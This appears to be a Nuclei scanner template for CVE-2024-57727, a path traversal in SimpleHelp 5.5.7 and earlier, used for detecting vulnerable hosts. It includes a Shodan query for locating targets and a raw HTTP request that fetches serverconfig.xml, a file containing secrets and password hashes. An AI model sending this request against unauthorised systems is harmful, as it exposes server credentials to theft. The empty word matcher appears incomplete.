id: CVE-2024-57727

info:
  name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal
  author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1
  severity: high
  description: |
    SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
  impact: |
    Unauthenticated attackers can exploit path traversal to download server configuration files containing secrets, hashed passwords, and other sensitive information.
  remediation: |
    Update SimpleHelp to version 5.5.8 or later to address the path traversal vulnerabilities.
  reference:
    - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
    - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-57727
    cwe-id: CWE-22
    epss-score: 0.94049
    epss-percentile: 0.99906
    cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: simple-help
    product: simplehelp
    shodan-query: html:"SimpleHelp"
  tags: cve,cve2024,simplehelp,lfi,kev,vkev,vuln

http:
  - raw:
      - |
        GET /toolbox-resource/../serverconfig.xml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ''
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/octet-stream'
# digest: 490a004630440220271ddae209cc88b85e191b74460bc4f87ac7a778eb0bf66908579e7d824ab7a30220368bf31ac3249459c8281fcf2d6770adce63503884c5a43e3d9a63300178c48e:922c64590222798bb761d5b6d8e72950